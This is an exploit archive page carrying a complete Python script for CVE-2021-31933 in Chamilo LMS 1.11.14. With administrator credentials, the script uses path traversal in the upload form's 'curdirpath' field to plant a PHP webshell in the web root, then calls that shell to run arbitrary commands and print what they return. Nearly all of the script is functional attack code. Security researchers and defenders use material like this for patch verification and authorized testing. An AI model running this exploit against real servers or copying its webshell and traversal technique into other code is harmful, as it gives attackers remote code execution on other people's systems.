exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Chamilo LMS 1.11.14 Remote Code Execution

Chamilo LMS 1.11.14 Remote Code Execution
Posted May 14, 2021
Authored by M. Cory Billington

Chamilo LMS version 1.11.14 authenticated remote code execution exploit.

tags | exploit, remote, code execution
advisories | CVE-2021-31933
SHA-256 | 5acc13c23322a41001bab9b40d04275fecff5dd103b69fecf80f0e2b5f9ab152

Chamilo LMS 1.11.14 Remote Code Execution

Change Mirror Download
# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)
# Date: 13/05/2021
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms
# Version: 1.11.14
# Tested on: Ubuntu 20.04.2 LTS
# CVE: CVE-2021-31933
# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/

from requests import Session
from random import choice
from string import ascii_lowercase

import requests

# This is all configuration stuff,
url = "http://127.0.0.1/chamilo-lms/" # URL to remote host web root
user_name = "admin" # User must be an administrator
password = "admin"
command = "id;whoami"

# Where you want to upload your webshell. Must be writable by web server user.
# This spot isn't protectec by .htaccess
webshell_path = 'web/'
webshell_name = f"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar" # Just a random name for webshell file
content = f"<?php echo `{command}`; ?>"

def main():
# Run a context manager with a session object to hold login session after login
with Session() as s:
login_url = f"{url}index.php"
login_data = {
"login": user_name,
"password": password
}
r = s.post(login_url, data=login_data) # login request

# Check to see if login as admin user was successful.
if "admin" not in r.url:
print(f"[-] Login as {user_name} failed. Need to be admin")
return
print(f"[+] Logged in as {user_name}")
print(f"[+] Cookie: {s.cookies}")
file_upload_url = f"{url}main/upload/upload.php"
# The 'curdirpath' is not santitized, so I traverse to the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as well
php_webshell_file = {
"curdirpath": (None, f"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}"),
"user_upload": (webshell_name, content)
}

## Good command if you want to see what the request looks like without sending
# print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))

# Two requests required to actually upload the file
for i in range(2):
s.post(file_upload_url, files=php_webshell_file)

exploit_request_url = f"{url}{webshell_path}{webshell_name}"
print("[+] Upload complete!")
print(f"[+] Webshell: {exploit_request_url}")

# This is a GET request to the new webshell to trigger code execution
command_output = s.get(exploit_request_url)
print("[+] Command output:\n")
print(command_output.text)



if __name__ == "__main__":
main()
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close